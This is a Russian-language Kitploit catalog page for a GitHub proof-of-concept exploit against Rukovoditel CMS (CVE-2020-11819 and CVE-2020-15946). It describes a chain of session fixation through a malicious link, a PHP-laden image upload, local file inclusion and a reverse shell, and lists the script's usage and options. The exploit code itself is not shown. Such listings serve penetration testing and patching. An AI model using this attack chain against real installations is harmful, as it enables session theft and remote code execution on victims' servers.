Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-RCE-Rukovoditel — Доказательство концепции для CVE-2020-11819 и CVE-2020-15946 | Kitploit
Инструменты/GitHubGitHub/danyx07/poc-rce-rukovoditel
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubdanyx07/poc-rce-rukovoditel

PoC-RCE-Rukovoditel

Доказательство концепции для CVE-2020-11819 и CVE-2020-15946

Репозиторий
5 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC-RCE-Rukovoditel

Доказательство концепции для CVE-2020-11819 и CVE-2020-15946. Протестировано на Rukovoditel 2.4.x, 2.5.x и 2.6.1

Описание:

Этот эксплойт имеет два режима выполнения: использование уязвимости фиксации сессии (CVE-2020-15946) или использование учётных данных доступа любой учётной записи с любым профилем. С помощью опции --type L этот скрипт создаст вредоносную ссылку: если жертва откроет её в браузере, будет установлен произвольный идентификатор сессии, который будет использован для кражи её сессии после загрузки изображения с PHP-содержимым в её профиль, а затем будет использовано локальное включение файлов (CVE-2020-11819) для получения удобного reverse shell. Либо, с помощью опций --type C -u -p , вы можете указать учётные данные, загрузить изображение с PHP-содержимым и использовать локальное включение файлов (CVE-2020-11819) для достижения выполнения кода.

Совет: не забудьте проверить, включён ли модуль регистрации ;)

Использование

exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]

Пост-аутентификационный RCE для rukovoditel, версия скрипта 1.0

необязательные аргументы:
-h, --help показать это справочное сообщение и выйти
-t URL, --target URL URL/Полный путь к CMS Rukovoditel http://url/path/to/cms/
-u USER, --user USER Имя пользователя для аутентификации
-p PASSWORD, --password PASSWORD Пароль для аутентификации
-a TYPE, --type TYPE Используйте -a L для генерации ссылки и кражи сессии или -a C, если у вас есть учётные данные доступа к веб-приложению
--ip IP_ATTACKER IP атакующего для reverse shell!
--port PORT_ATTACKER Порт для подключения reverse shell
--proxy PROXY Настройка HTTP-прокси для отладки

http://127.0.0.1:8080
Скачать инструмент